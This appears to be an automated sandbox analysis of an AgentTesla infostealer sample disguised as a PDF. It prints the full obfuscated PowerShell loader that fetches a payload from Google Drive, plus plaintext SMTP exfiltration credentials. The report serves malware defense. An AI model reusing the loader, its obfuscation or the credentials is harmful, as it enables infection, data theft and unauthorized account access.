agenttesla | 2709e4f356357ea81f0d62620cb8b291dcf2323036fde3d086688f9a4ed047f8

General

Target

20240403_SUA-000279-23.pdf.vbs
Size

39KB
MD5

9332a3e3c00a2be6ee157055b9abc8f5
SHA1

d495c9ed2015c481626609fcb53349ccb7734301
SHA256

27621d4524d2feed05a6b2e9e7a46874328060c0c1a39506ddfb08f94c7ea2d3
SHA512

921f161cd6cab441ae3e4cd92be05b3dc42845f5181e1d697d011a224cf9c6b7ae2c75f150f04fb9120a1a108b9898fefffdc132f6f4ddbfc641fa9bf81055b8
SSDEEP

768:u0zgBwjWAZGc8NnKwiQlPQcUyO0ljLecJhd:AYqNnKwNocUyO0/

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.electricistas-24hs.com.ar
Port:
587
Username:
[email protected]
Password:
Martin*olmos2017
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	drive.google.com
18	drive.google.com
23	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	api.ipify.org
37	api.ipify.org
39	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1776	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1784	powershell.exe
1776	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1784 set thread context of 1776	1784	powershell.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2364	powershell.exe
2364	powershell.exe
1784	powershell.exe
1784	powershell.exe
1784	powershell.exe
1776	wab.exe
1776	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1784	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1776	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 880 wrote to memory of 2364	880	WScript.exe	80
PID 880 wrote to memory of 2364	880	WScript.exe	80
PID 2364 wrote to memory of 412	2364	powershell.exe	85
PID 2364 wrote to memory of 412	2364	powershell.exe	85
PID 2364 wrote to memory of 1784	2364	powershell.exe	93
PID 2364 wrote to memory of 1784	2364	powershell.exe	93
PID 2364 wrote to memory of 1784	2364	powershell.exe	93
PID 1784 wrote to memory of 4000	1784	powershell.exe	94
PID 1784 wrote to memory of 4000	1784	powershell.exe	94
PID 1784 wrote to memory of 4000	1784	powershell.exe	94
PID 1784 wrote to memory of 1776	1784	powershell.exe	95
PID 1784 wrote to memory of 1776	1784	powershell.exe	95
PID 1784 wrote to memory of 1776	1784	powershell.exe	95
PID 1784 wrote to memory of 1776	1784	powershell.exe	95
PID 1784 wrote to memory of 1776	1784	powershell.exe	95

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20240403_SUA-000279-23.pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Paramountly Approberingerne elevskolernes differentialkvotient apoplektikere Thorvaldsen Chally #>;$Consortable=(cmd /c set /A 115^^0);Function Stevensons ([String]$planlggelsen){$Lgdet=[char][int]$Consortable+'ubstring';$lightsmen=8;$Osmar=Programudvikling($planlggelsen);For($Corkwoods=7; $Corkwoods -lt $Osmar; $Corkwoods+=$lightsmen){$Terribilita=$planlggelsen.$Lgdet.Invoke($Corkwoods, 1);$correspondingly=$correspondingly+$Terribilita;}$correspondingly;}function Tankpasserens ($Overfrslen){& ($Privateje) ($Overfrslen);}function Programudvikling ([String]$Counterwave){$Mineralizing=$Counterwave.Length-1;$Mineralizing;}$Samletankens=Stevensons ' MovereTFuldbyrrOmkostnademonstnKomintesSjls ilfT ngesteujvntunr Reo ierFlutieriArterionFagbevggmandlig ';$Akkomoderende=Stevensons 'ghanesehMennesktSomewhet,ekstbepRecrosssOutbou : Ror ma/Governa/Re frdidSuperderCondol,iSideta vDeu esfeKarlfol.AlarmisgTonatiooJerrymao I tarsg Uh,ldelHkkelbee rbesk.Indkaldc B,drago gamli,mSolopg /DivergeuGenetikcAarstal?TabulateBaadplaxBruskedpFeroheroSmell urDentinet autohe=U edifydEyefulmoBrairdew Frigidn Finansl MerskuoBrdde.gaSkolehjd,ildnis&SigismuiForvrvldBaadtyp=Velsest1Ageable7LaundroC Far.edBGehenna-Desillu6 StetistUdtalerhAnsvarl-Fredain- N sotrtBebyrdet Mo,rke3HovedreEAlthionlNotan,udLredrenM CelebrQ Whackyiunmu.teLCarceris Rhamnaz.nsalubPPseudotFDetona.Wgar.enip.lanontG Dile teHudfletYForlggebRangletQKnsce lHenlis,ek Plante ';$Privateje=Stevensons 'ApiaceaienviouseRealtidx H,ndba ';$Bruget=Stevensons 'For udn$hortatogFilagrelKurslisomisenrobSureresaUnderh.lAfvikli:geranioRIot.zataHektogrdForcerabH ghboyr Amill,kiotizednAl ergiiUdfaldsnAcetophgBattemeeresp tenDyknder T nghre=Mer eri VentrosSCarminatHandelsaOve,vaerOutlivit.vistlr-galvaniB BrontoiPetrosatbekommesAfvrg mTToma,pur Paganea V.deren FollicsEphemerfBiopyrieTrivielr U.ders T.treri-She pmiS .loretoPat.nteuFoxingbrM.turercUnpalleeEohipp S,filit$svalestANikko,ekMewledbk piledeoHydrogemPampl.no,icromad.ksperteReafforr Nj,gtieRestaurnSulphurd.aktosee Paskon Klvedes-Insti uDSyltnineBatterisIndem.itNoctuidiUnslaken Udskrea Sass.btJespersiDidiniuo FrittenUsoigne Overhri$CastoreKSacrumsyDictyo.sStteskitmetalhjsCont intHell,olrImm rtak Encephnbland.niSuppor,nEvanescgStampere ,ranslrGena,skn,vantoves,egerssReshe,r ';Tankpasserens (Stevensons 'Jumelle$Pe elsgg Debattl LykkeloLanchapbV.lutaeaFdrelanlOverens: PrickfKKroelley Efter,s.epinertBrdf.ugs PalebutWarbirdrForval kHolocepnBenzinmiTopbelanFireugeg .irgineNytteplrOmrringnUdkkedee ,artelsAortost=barm.ca$ SikkerePaketshnepactssvPrincip:PedestraSpunsjepChildlepWatchwodMarescea spr,ebtAnmeldea Linoxy ') ;Tankpasserens (Stevensons 'Ashati,ISkefuldmDiciertpKroman.oldsterarskueplatPro,and-Smgen,sMVsensf oEksponedKumenikuCuredemlStormaneG stroe Clag,edBMonophoi FodfsttCo.servs,malmedT EinarsrFol,ereaZequi bn AlewafsMetam,rfRamos.le StamborSmigsgr ') ;$Kyststrkningernes=$Kyststrkningernes+'\Revaccinationens.afb' ;Tankpasserens (Stevensons 'hyperpa$MagtendgForsidel Sujetto Phosphb TracesaMrkes.gl Papemb:ElkdomaSAkillesaSkinnecmS.rattelH.lidaee Quilter Plai emTheatreaPreflavnOt,rrheiReassoc=Bagfjer( Da vagTalbatroeDuctilis Interct,okalom- UrvrkaP,roevetairritabtPe tisehBi.olou P askva$ FiduseKPeach.eyUxori,us Lagenlt UnicapsSal ssytHyaliterFremsttkLed agenRheinlniFondsv nUtilisagTriangleAarsagsrPdia rin,ishrage .ormnisS,nneps)Hostage ') ;while (-not $Samlermani) {Tankpasserens (Stevensons ' LeacheItheobrof Upjetu Testify(Boligha$ Mistf,RZurtjleaMisvkstdPlad.hubS,aapenrkalium.kComplimn AppendiKriminanTonguefgLagun,neFredninnSofacyk.ElvirasJAsafetioMa ulerbAnabelmSSkudtestImpugniaL,rstamt NittereLoghead Elabor,-Spderine,ozzetiqOphvels Micromo$b.skereSeksperia C.lubamQuitrenl ReinveeScleredtskiferta Fodp.nnBrio.hek.verganeKrys.alnSegmentsTran mi)Hu,drum Loobyi,{ frersoS ForskntKrft peaSkelletrGrah,mit Indole- AkkillSTrakkaslScyll oe LreproeKhmersmpRiobard Dukater1mul ist}ompha.ieSejernelStedbessDioxi.ee Prvepe{KrypterSEspart tJunkernaVrdikuprUnseductNonev,s-revolutS Ls.edrl,ongerseSt,rhedeGadehjrpUnlabor Udelade1 Sta.dp; Meta lTSpiri.haCorecipn scler,kCeonocypDeactivaNaboretsReadm.tsKomple,eFlirtisr Co,ntee.tultifnUnperpesMisinfo Overchu$Bolet iBHo,etowr .poleruomrystegJouis neWeakentt Kornel}Sweepag ');Tankpasserens (Stevensons 'Clitoro$BesjledgCaptanclWeddingoLecithibthorsteaCephalilFeazing: RontgeSGallo,yaUdfrittmer.oglalS mipopeLeu emirForetagmSkaanetaDepositnOpdyrkniVac.ola=Alkylfi(PrecoolTF ankose GenindsTrskoentDd stra-M.rokkaPAbov praFlbet.ntFgte.unh Fasti, Ref,eks$ FanjetKPaalideymoni,ors Hirun tTiltusksGrusnintTulreder Markrkk Udmrken Zobel,i nsuggenVandstvg GennemeplamagerBrevsamnTeindnieun ubtrsSaturni)Overhan ') ;}Tankpasserens (Stevensons ' depett$JokeprogHydrogrlRe,resho Va.dypbEngle,aaSammenflPredism:Shiats O Inspirp Bio enlOverbidaRe.astenRespektd,agtimeePdagogitafpling Naestve= Compea LucarneGStngelkeHadro.ntFor.gsa- Ter osCTheocraoBugbearnfjel.ettblndingeuntappinUnfo.matLev eds S,iple$ jernetKSkat evyBaseh.asSh,msgatTraditisReseq,etmanglerr SpirockDelprobn,arehusiOverdranEksklusgOga,lalepredesirStandarnBoledese ConfessRevolte ');Tankpasserens (Stevensons '.ensdyr$ ffedtegS,jdelelFrakrsloPapillobFotosa.aFormatolAl,erln:Pe.itriOElboicupFissionr gallinr ToppunsBagskrmsVaadesttUnv.lveiCardinaf H lpeft OlethreSkipp.erPrech l Nocias.=Litaiba ygning[Dispon,SBulldozyHngslersHe,rtletProlon.eCitr,nsmLundres..uttsgaCSatsarboFoedevanReetablv.addelme Gennemr PhotoktI,dchec] Maaned: ufor n:NogentiFBarmiesrSnuppeno Hedtanm ScatosBbidentiaSauroctstarife eVindkra6Nrligge4CalcipeS skri.etmaskinor Apoembi AlvorlnForstvsg agsger(Ansttel$afflatuOGenyantpReedm.nl .okereaReincapn CovetedHarvnineafs,itntAnarki,)Skjo te ');Tankpasserens (Stevensons 'Tuftska$Suspe sgSum,hpjl AnthrooUngoverbRemagnea.ilstopl Carton:ArcedavMforstrkeArsmetiiSerescan tudevoe Afs,rirEbullietSkilre. Knoerpo= Omsorg Miterw[U.opfreSS.ndikaydiskotesUneschetAnglopheskaglesmPred.fe.KlaustrTNoviciaeWrithedx ernbantLexicol.rigleniETailyopnsemis,vcHalverso Jayc edSpurri idiaspornDi.ponegUnlabia]Gr.ttle:Bdeudma:BethornAMarginaSCurrishC H,delsICacophoISulfazi.OverbebGIndefrye SkabsdtSpellboSDemurrat Airwa r Vederhi SkalpenCytochegBaskerv(Microhi$Adf dsfOPr,distp,erveburTragtharBlo,sdrsAmphictsKultu,stProfessiTritopifAmtsbortQuindeceUnviol.rKaut on)Wooe po ');Tankpasserens (Stevensons 'Initial$ MidtergAkustiklMellemlo RegeribSalateraDemiv,llMotoriz:,emiterBDep oreaStonisha,orelledMtaalelsPaprikamFjeldrraSkaar gnHinduerdKimberlsPred sis armarktVidundeoMilitrtl Snork 1prealli4Yrkern,2 Respek= ituati$NinoxmaMSymphyseHringeriExc ucinHakkebfeMdendesrCloacast Harp,o.BogmarksTmrerbluVicomt,b skraassPj skfutShefftarPampangi AkustinIndbildg Ce bal(Redning3Nettok 0Asteroi0praxis.1Dekstri6 Catsti2 Unuanc,Taurino3angrebs2,ercept1Ti illa5Skattei1Barra r)Total.p ');Tankpasserens $Baadsmandsstol142;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    3⤵
    PID:412
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Paramountly Approberingerne elevskolernes differentialkvotient apoplektikere Thorvaldsen Chally #>;$Consortable=(cmd /c set /A 115^^0);Function Stevensons ([String]$planlggelsen){$Lgdet=[char][int]$Consortable+'ubstring';$lightsmen=8;$Osmar=Programudvikling($planlggelsen);For($Corkwoods=7; $Corkwoods -lt $Osmar; $Corkwoods+=$lightsmen){$Terribilita=$planlggelsen.$Lgdet.Invoke($Corkwoods, 1);$correspondingly=$correspondingly+$Terribilita;}$correspondingly;}function Tankpasserens ($Overfrslen){& ($Privateje) ($Overfrslen);}function Programudvikling ([String]$Counterwave){$Mineralizing=$Counterwave.Length-1;$Mineralizing;}$Samletankens=Stevensons ' MovereTFuldbyrrOmkostnademonstnKomintesSjls ilfT ngesteujvntunr Reo ierFlutieriArterionFagbevggmandlig ';$Akkomoderende=Stevensons 'ghanesehMennesktSomewhet,ekstbepRecrosssOutbou : Ror ma/Governa/Re frdidSuperderCondol,iSideta vDeu esfeKarlfol.AlarmisgTonatiooJerrymao I tarsg Uh,ldelHkkelbee rbesk.Indkaldc B,drago gamli,mSolopg /DivergeuGenetikcAarstal?TabulateBaadplaxBruskedpFeroheroSmell urDentinet autohe=U edifydEyefulmoBrairdew Frigidn Finansl MerskuoBrdde.gaSkolehjd,ildnis&SigismuiForvrvldBaadtyp=Velsest1Ageable7LaundroC Far.edBGehenna-Desillu6 StetistUdtalerhAnsvarl-Fredain- N sotrtBebyrdet Mo,rke3HovedreEAlthionlNotan,udLredrenM CelebrQ Whackyiunmu.teLCarceris Rhamnaz.nsalubPPseudotFDetona.Wgar.enip.lanontG Dile teHudfletYForlggebRangletQKnsce lHenlis,ek Plante ';$Privateje=Stevensons 'ApiaceaienviouseRealtidx H,ndba ';$Bruget=Stevensons 'For udn$hortatogFilagrelKurslisomisenrobSureresaUnderh.lAfvikli:geranioRIot.zataHektogrdForcerabH ghboyr Amill,kiotizednAl ergiiUdfaldsnAcetophgBattemeeresp tenDyknder T nghre=Mer eri VentrosSCarminatHandelsaOve,vaerOutlivit.vistlr-galvaniB BrontoiPetrosatbekommesAfvrg mTToma,pur Paganea V.deren FollicsEphemerfBiopyrieTrivielr U.ders T.treri-She pmiS .loretoPat.nteuFoxingbrM.turercUnpalleeEohipp S,filit$svalestANikko,ekMewledbk piledeoHydrogemPampl.no,icromad.ksperteReafforr Nj,gtieRestaurnSulphurd.aktosee Paskon Klvedes-Insti uDSyltnineBatterisIndem.itNoctuidiUnslaken Udskrea Sass.btJespersiDidiniuo FrittenUsoigne Overhri$CastoreKSacrumsyDictyo.sStteskitmetalhjsCont intHell,olrImm rtak Encephnbland.niSuppor,nEvanescgStampere ,ranslrGena,skn,vantoves,egerssReshe,r ';Tankpasserens (Stevensons 'Jumelle$Pe elsgg Debattl LykkeloLanchapbV.lutaeaFdrelanlOverens: PrickfKKroelley Efter,s.epinertBrdf.ugs PalebutWarbirdrForval kHolocepnBenzinmiTopbelanFireugeg .irgineNytteplrOmrringnUdkkedee ,artelsAortost=barm.ca$ SikkerePaketshnepactssvPrincip:PedestraSpunsjepChildlepWatchwodMarescea spr,ebtAnmeldea Linoxy ') ;Tankpasserens (Stevensons 'Ashati,ISkefuldmDiciertpKroman.oldsterarskueplatPro,and-Smgen,sMVsensf oEksponedKumenikuCuredemlStormaneG stroe Clag,edBMonophoi FodfsttCo.servs,malmedT EinarsrFol,ereaZequi bn AlewafsMetam,rfRamos.le StamborSmigsgr ') ;$Kyststrkningernes=$Kyststrkningernes+'\Revaccinationens.afb' ;Tankpasserens (Stevensons 'hyperpa$MagtendgForsidel Sujetto Phosphb TracesaMrkes.gl Papemb:ElkdomaSAkillesaSkinnecmS.rattelH.lidaee Quilter Plai emTheatreaPreflavnOt,rrheiReassoc=Bagfjer( Da vagTalbatroeDuctilis Interct,okalom- UrvrkaP,roevetairritabtPe tisehBi.olou P askva$ FiduseKPeach.eyUxori,us Lagenlt UnicapsSal ssytHyaliterFremsttkLed agenRheinlniFondsv nUtilisagTriangleAarsagsrPdia rin,ishrage .ormnisS,nneps)Hostage ') ;while (-not $Samlermani) {Tankpasserens (Stevensons ' LeacheItheobrof Upjetu Testify(Boligha$ Mistf,RZurtjleaMisvkstdPlad.hubS,aapenrkalium.kComplimn AppendiKriminanTonguefgLagun,neFredninnSofacyk.ElvirasJAsafetioMa ulerbAnabelmSSkudtestImpugniaL,rstamt NittereLoghead Elabor,-Spderine,ozzetiqOphvels Micromo$b.skereSeksperia C.lubamQuitrenl ReinveeScleredtskiferta Fodp.nnBrio.hek.verganeKrys.alnSegmentsTran mi)Hu,drum Loobyi,{ frersoS ForskntKrft peaSkelletrGrah,mit Indole- AkkillSTrakkaslScyll oe LreproeKhmersmpRiobard Dukater1mul ist}ompha.ieSejernelStedbessDioxi.ee Prvepe{KrypterSEspart tJunkernaVrdikuprUnseductNonev,s-revolutS Ls.edrl,ongerseSt,rhedeGadehjrpUnlabor Udelade1 Sta.dp; Meta lTSpiri.haCorecipn scler,kCeonocypDeactivaNaboretsReadm.tsKomple,eFlirtisr Co,ntee.tultifnUnperpesMisinfo Overchu$Bolet iBHo,etowr .poleruomrystegJouis neWeakentt Kornel}Sweepag ');Tankpasserens (Stevensons 'Clitoro$BesjledgCaptanclWeddingoLecithibthorsteaCephalilFeazing: RontgeSGallo,yaUdfrittmer.oglalS mipopeLeu emirForetagmSkaanetaDepositnOpdyrkniVac.ola=Alkylfi(PrecoolTF ankose GenindsTrskoentDd stra-M.rokkaPAbov praFlbet.ntFgte.unh Fasti, Ref,eks$ FanjetKPaalideymoni,ors Hirun tTiltusksGrusnintTulreder Markrkk Udmrken Zobel,i nsuggenVandstvg GennemeplamagerBrevsamnTeindnieun ubtrsSaturni)Overhan ') ;}Tankpasserens (Stevensons ' depett$JokeprogHydrogrlRe,resho Va.dypbEngle,aaSammenflPredism:Shiats O Inspirp Bio enlOverbidaRe.astenRespektd,agtimeePdagogitafpling Naestve= Compea LucarneGStngelkeHadro.ntFor.gsa- Ter osCTheocraoBugbearnfjel.ettblndingeuntappinUnfo.matLev eds S,iple$ jernetKSkat evyBaseh.asSh,msgatTraditisReseq,etmanglerr SpirockDelprobn,arehusiOverdranEksklusgOga,lalepredesirStandarnBoledese ConfessRevolte ');Tankpasserens (Stevensons '.ensdyr$ ffedtegS,jdelelFrakrsloPapillobFotosa.aFormatolAl,erln:Pe.itriOElboicupFissionr gallinr ToppunsBagskrmsVaadesttUnv.lveiCardinaf H lpeft OlethreSkipp.erPrech l Nocias.=Litaiba ygning[Dispon,SBulldozyHngslersHe,rtletProlon.eCitr,nsmLundres..uttsgaCSatsarboFoedevanReetablv.addelme Gennemr PhotoktI,dchec] Maaned: ufor n:NogentiFBarmiesrSnuppeno Hedtanm ScatosBbidentiaSauroctstarife eVindkra6Nrligge4CalcipeS skri.etmaskinor Apoembi AlvorlnForstvsg agsger(Ansttel$afflatuOGenyantpReedm.nl .okereaReincapn CovetedHarvnineafs,itntAnarki,)Skjo te ');Tankpasserens (Stevensons 'Tuftska$Suspe sgSum,hpjl AnthrooUngoverbRemagnea.ilstopl Carton:ArcedavMforstrkeArsmetiiSerescan tudevoe Afs,rirEbullietSkilre. Knoerpo= Omsorg Miterw[U.opfreSS.ndikaydiskotesUneschetAnglopheskaglesmPred.fe.KlaustrTNoviciaeWrithedx ernbantLexicol.rigleniETailyopnsemis,vcHalverso Jayc edSpurri idiaspornDi.ponegUnlabia]Gr.ttle:Bdeudma:BethornAMarginaSCurrishC H,delsICacophoISulfazi.OverbebGIndefrye SkabsdtSpellboSDemurrat Airwa r Vederhi SkalpenCytochegBaskerv(Microhi$Adf dsfOPr,distp,erveburTragtharBlo,sdrsAmphictsKultu,stProfessiTritopifAmtsbortQuindeceUnviol.rKaut on)Wooe po ');Tankpasserens (Stevensons 'Initial$ MidtergAkustiklMellemlo RegeribSalateraDemiv,llMotoriz:,emiterBDep oreaStonisha,orelledMtaalelsPaprikamFjeldrraSkaar gnHinduerdKimberlsPred sis armarktVidundeoMilitrtl Snork 1prealli4Yrkern,2 Respek= ituati$NinoxmaMSymphyseHringeriExc ucinHakkebfeMdendesrCloacast Harp,o.BogmarksTmrerbluVicomt,b skraassPj skfutShefftarPampangi AkustinIndbildg Ce bal(Redning3Nettok 0Asteroi0praxis.1Dekstri6 Catsti2 Unuanc,Taurino3angrebs2,ercept1Ti illa5Skattei1Barra r)Total.p ');Tankpasserens $Baadsmandsstol142;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      4⤵
      PID:4000
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmdtzz5n.1vn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1776-57-0x0000000000C00000-0x0000000001E54000-memory.dmp

Filesize
18.3MB

Download
memory/1776-67-0x0000000022860000-0x000000002286A000-memory.dmp

Filesize
40KB

Download
memory/1776-66-0x0000000022F40000-0x0000000022FD2000-memory.dmp

Filesize
584KB

Download
memory/1776-62-0x00000000228F0000-0x000000002298C000-memory.dmp

Filesize
624KB

Download
memory/1776-61-0x0000000022800000-0x0000000022850000-memory.dmp

Filesize
320KB

Download
memory/1776-58-0x0000000000C00000-0x0000000000C42000-memory.dmp

Filesize
264KB

Download
memory/1784-41-0x00000000086C0000-0x000000000AC23000-memory.dmp

Filesize
37.4MB

Download
memory/1784-36-0x0000000006F00000-0x0000000006F96000-memory.dmp

Filesize
600KB

Download
memory/1784-17-0x0000000002350000-0x0000000002386000-memory.dmp

Filesize
216KB

Download
memory/1784-18-0x0000000004ED0000-0x00000000054F8000-memory.dmp

Filesize
6.2MB

Download
memory/1784-19-0x0000000004DE0000-0x0000000004E02000-memory.dmp

Filesize
136KB

Download
memory/1784-20-0x00000000055B0000-0x0000000005616000-memory.dmp

Filesize
408KB

Download
memory/1784-21-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/1784-31-0x0000000005690000-0x00000000059E4000-memory.dmp

Filesize
3.3MB

Download
memory/1784-32-0x0000000005C80000-0x0000000005C9E000-memory.dmp

Filesize
120KB

Download
memory/1784-33-0x0000000005CC0000-0x0000000005D0C000-memory.dmp

Filesize
304KB

Download
memory/1784-34-0x00000000074E0000-0x0000000007B5A000-memory.dmp

Filesize
6.5MB

Download
memory/1784-35-0x0000000006280000-0x000000000629A000-memory.dmp

Filesize
104KB

Download
memory/1784-37-0x0000000006EA0000-0x0000000006EC2000-memory.dmp

Filesize
136KB

Download
memory/1784-40-0x0000000007170000-0x0000000007184000-memory.dmp

Filesize
80KB

Download
memory/1784-38-0x0000000008110000-0x00000000086B4000-memory.dmp

Filesize
5.6MB

Download
memory/1784-39-0x0000000006ED0000-0x0000000006EF2000-memory.dmp

Filesize
136KB

Download
memory/2364-16-0x00007FFED0BB0000-0x00007FFED1671000-memory.dmp

Filesize
10.8MB

Download
memory/2364-0-0x00007FFED0BB3000-0x00007FFED0BB5000-memory.dmp

Filesize
8KB

Download
memory/2364-42-0x00007FFED0BB3000-0x00007FFED0BB5000-memory.dmp

Filesize
8KB

Download
memory/2364-43-0x00007FFED0BB0000-0x00007FFED1671000-memory.dmp

Filesize
10.8MB

Download
memory/2364-15-0x00007FFED0BB0000-0x00007FFED1671000-memory.dmp

Filesize
10.8MB

Download
memory/2364-14-0x000001BC26C80000-0x000001BC26C94000-memory.dmp

Filesize
80KB

Download
memory/2364-60-0x00007FFED0BB0000-0x00007FFED1671000-memory.dmp

Filesize
10.8MB

Download
memory/2364-13-0x000001BC26C30000-0x000001BC26C56000-memory.dmp

Filesize
152KB

Download
memory/2364-12-0x00007FFED0BB0000-0x00007FFED1671000-memory.dmp

Filesize
10.8MB

Download
memory/2364-11-0x00007FFED0BB0000-0x00007FFED1671000-memory.dmp

Filesize
10.8MB

Download
memory/2364-1-0x000001BC0E0E0000-0x000001BC0E102000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing